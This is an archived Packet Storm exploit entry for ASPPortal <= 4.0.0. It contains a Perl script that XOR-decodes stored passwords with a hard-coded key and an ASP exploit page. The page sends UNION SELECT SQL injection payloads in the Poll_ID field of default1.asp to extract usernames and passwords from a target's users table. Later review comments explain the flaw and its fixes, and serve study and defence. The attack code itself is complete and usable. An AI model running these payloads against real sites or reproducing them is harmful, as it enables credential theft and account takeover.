ASPPortal-400.txt

2006-11-14T00:00:00
ID PACKETSTORM:52011
Type packetstorm
Reporter ajann
Modified 2006-11-14T00:00:00

Description

                                        
                                            `Perl Script Decode:  
  
#!/usr/bin/perl  
#AspPortal Password Decrypter  
#Get pass exploit.asp and this copy this window  
#Special Thanks To::: Nukedx ,For ASPPORTAL Decrypter  
#ajann  
# Script entry point. `@1 = 1` is a list assignment, not a comparison; used as
# an `if` condition it evaluates to the number of elements assigned (1), so the
# test is always true and exploit() is always called.
if(@1 = 1) { exploit(); }  
  
# decrypt: turn the encoded password held in the global $appass back into
# clear text and print it.
#
# Reads:   $appass (assigned by exploit()).
# Writes:  $appwd (global; each decoded character is prepended to it).
# Effect:  prints the decoded string and ends the process with exit();
#          dies with an error message when $appass is empty.
#
# Every character of $appass is XORed with the character at the same index of
# the constant $apkey. XOR with a fixed key is its own inverse, so the same
# operation encodes and decodes.
# NOTE(review): the script header calls this an "AspPortal Password Decrypter",
# which implies the portal stores passwords under this same constant key rather
# than as salted one-way hashes - TODO confirm against the application source.
# If so, disclosure of the stored column discloses every clear-text password;
# the remedy is a salted password hash plus a forced reset, not a new key.
sub decrypt ()  
{  
$lp = length($appass);  
# Constant XOR key, hard-coded in this script.
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";  
# Nothing to decode: stop with an error.
if ($lp == 0) { die("- An error occurued\r\n"); }  
for ($i = 0; $i < $lp ; $i++) {  
$f = $lp - $i - 1; # index being processed: counts down from the last position to 0  
$n = substr($apkey,$f,1);  
$l = substr($appass,$f,1);  
# XOR the key character with the input character; prepending keeps the
# output in the original left-to-right order despite the reverse walk.
$appwd = chr(ord($n)^ord($l)).$appwd;  
}  
print "- Password decrypted as: $appwd\r\n";  
exit();  
}  
# exploit: prompt for the encoded password on STDIN, store it in the global
# $appass and call decrypt(). Despite its name, this sub sends nothing over the
# network; it only reads one line of input.
sub exploit ()   
{  
print "Password?: ";  
$kroo = <STDIN>;  
# chop removes the last character unconditionally (the newline, when the
# input line ends with one).
chop ($kroo);  
$appass = $kroo;  
# The four substitutions replace ", <, > and space with chr(34), chr(60),
# chr(62) and chr(32) - the same characters - so $appass is left unchanged.
$appass =~ s/(")/chr(34)/eg;  
$appass =~ s/(<)/chr(60)/eg;  
$appass =~ s/(>)/chr(62)/eg;  
$appass =~ s/( )/chr(32)/eg;  
# decrypt() ends the process itself (exit or die), so the exit() below is
# not reached.
decrypt();  
exit();   
}  
  
  
  
Exploit:  
  
  
<% ' Buffer the whole response before sending it; presumably needed because the Response.Redirect calls further down run after HTML has already been written.
Response.Buffer = True %>  
<% ' From here on a run-time error does not stop the page: execution continues with the next statement.
On Error Resume Next %>  
<% ' Script time limit for this page, set to 100.
Server.ScriptTimeout = 100 %>  
  
<%  
  
'===============================================================================================  
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit  
'[Coded by : ajann  
'[Author : ajann  
'[Contact : :(  
'[ExploitName: exploit1.asp  
  
'[Note : exploit file name =>exploit1.asp  
'[Using : Write Target and ID after Submit Click  
'[Using : Tr:Alınan Sifreyi Perl scriptinde cözün.  
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz  
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.  
'===============================================================================================  
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke  
  
%>  
  
<html>  
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>  
<head>  
  
<script language="JavaScript">   
// Schedules functionControl2() to run after 2000 ms.
function functionControl1(){   
setTimeout("functionControl2()",2000);   
}   
  
// Shows a failure alert when the value of form1.field1 is an empty string;
// does nothing otherwise.
function functionControl2(){
    var fetched = document.form1.field1.value;
    if (fetched != "") {
        return;
    }
    alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
  
// Writes a "data not received" notice into the element with id "htmlAlani"
// when the value of form1.field1 is an empty string; does nothing otherwise.
function writetext() {
    var fieldIsEmpty = (document.form1.field1.value == "");
    if (!fieldIsEmpty) {
        return;
    }
    var notice = '<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>';
    document.getElementById('htmlAlani').innerHTML = notice;
}
// Schedules writetext() to run after 1000 ms.
function write(){   
setTimeout("writetext()",1000);   
}   
  
</script>  
  
  
</head>  
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">  
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">  
  
<center>  
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal <=</b>v4.0.0(default1.asp) <u><b>  
Remote SQL Injection Exploit</b></u></a></font><br><br>  
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">  
<tr>  
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">  
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>  
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User   
ID=1]</b></font></td>  
<td width="50%"><center>  
<form method="post" name="form1" action="exploit1.asp?islem=get">  
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">  
<input type="submit" value="Get"></center></td>  
</tr>  
  
</table>  
  
<div id=htmlAlani></div>  
  
<%
' Read the "islem" query-string value and print the matching validation
' message. hata1, hata2 and hata3 are the codes this page redirects to itself
' with when its own input checks fail; any other value prints nothing here.
islem = Request.QueryString("islem")
Select Case islem
    Case "hata1"
        Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
    Case "hata2"
        Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
    Case "hata3"
        Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End Select
%>
  
<%   
  
' Handle the submitted form: read the two inputs, check the target string, and
' redirect back to this page with an error code when a check fails. The four
' If blocks opened here are closed at the very end of the page.
If islem = "get" Then  
  
' Both requests use the same script name, default1.asp.
string1="default1.asp"  
string2="default1.asp"  
' Value of the "id" form field; it is not validated here and is appended
' verbatim to the POST body built in take() and take1().
cek= Request.Form("id")  
  
  
targettext = Request.Form("text1")  
' Case-insensitive searches (compare mode 1) for "union" and "http://" in the
' target string; each result is the match position, or 0 when absent.
arama=InStr(1, targettext, "union" ,1)  
arama2=InStr(1, targettext, "http://" ,1)  
  
' Empty target -> error code hata1.
If targettext="" Then  
Response.Redirect("exploit1.asp?islem=hata1")  
  
Else  
' Target contains "union" -> error code hata2.
If arama>0 then   
Response.Redirect("exploit1.asp?islem=hata2")  
  
Else  
' Target does not contain "http://" -> error code hata3.
If arama2=0 then   
Response.Redirect("exploit1.asp?islem=hata3")  
  
Else  
%>   
  
<%  
  
' Build the two request URLs by appending the script name to the submitted
' target. string1 and string2 are both "default1.asp", so the URLs are identical.
target1 = targettext+string1  
target2 = targettext+string2  
  
' take: send one synchronous POST to the URL in `come` and return the response
' body as text.
'
' The form body sets Voteit=1 and places a UNION SELECT in Poll_ID that reads
' the `username` column of `users` for the row whose user_id matches the
' page-level variable `cek`.
' NOTE(review): the request only returns data if the target builds its poll
' query by concatenating Poll_ID into the SQL text - presumably what
' default1.asp does in the affected releases; confirm against the application
' source. Binding Poll_ID as a numeric parameter, or rejecting any non-numeric
' value before the query is built, closes this path.
' NOTE(review): for log review, the visible signature is a POST to
' default1.asp whose Poll_ID value is not a plain integer.
Public Function take(come)  
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )  
With objtake  
' Third argument FALSE: the call is synchronous.
.Open "POST" , come, FALSE  
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"  
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek  
take = .Responsetext  
End With  
SET objtake = Nothing  
End Function  
  
' take1: send one synchronous POST to the URL in `come1` and return the
' response body as text.
'
' The form body sets Voteit=1 and places a UNION SELECT in Poll_ID that reads
' the `password` column of `users` for the row whose user_id matches the
' page-level variable `cek`.
' NOTE(review): the value returned this way is the stored password field; the
' page header says it still has to be decoded, which suggests the application
' keeps passwords in a reversible form - TODO confirm. Parameterising the
' Poll_ID query stops the read; moving to salted one-way password hashes
' limits what a read of this column can reveal.
Public Function take1(come1)  
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )  
With objtake1  
' Third argument FALSE: the call is synchronous.
.Open "POST" , come1, FALSE  
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"  
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek  
take1 = .Responsetext  
End With  
SET objtake1 = Nothing  
End Function  
  
' Send both requests and keep the raw response bodies.
get_username = take(target1)  
get_password = take1(target2)  
  
' Position of the poll-question label in the username response (0 when the
' label is absent).
getdata=InStr(get_username,"Poll Question:</b> " )  
' Fixed-width extraction: 14 characters starting 24 positions after that
' label. The position found in the username response is reused for the
' password response.
username=Mid(get_username,getdata+24,14)  
passwd=Mid(get_password,getdata+24,14)  
' NOTE(review): both values are raw slices of a remote server's response and
' are written into this page further down by inline ASP output expressions
' without Server.HTMLEncode, so any markup the remote host returns is rendered
' in the browser of whoever opens this page. Treat the sample as untrusted
' when analysing it.
  
%>  
<center>  
<font face="Verdana" size="2" color="#008000"> <u><b>  
ajann<br></b></u></font>  
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">  
<tr>  
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">              
<b><font size="2" face="Arial">User Name:</font></b></td>  
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>  
</tr>  
<tr>  
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">             
<b><font size="2" face="Arial"> User Password:</font></b></td>  
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>  
</tr>  
  
</table>  
  
<form method="POST" name="form2" action="#">   
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>   
</form>   
  
</center>  
  
<script language="JavaScript">  
write()  
functionControl1()  
</script>  
  
</body>  
</html>  
  
<%  
' Close the four nested If blocks opened in the form-handling section
' ("http://" check, "union" check, empty-target check, islem = "get").
End If  
End If  
End If  
End If  
' Set the page-level name objtake to Nothing.
Set objtake = Nothing   
%>  
  
`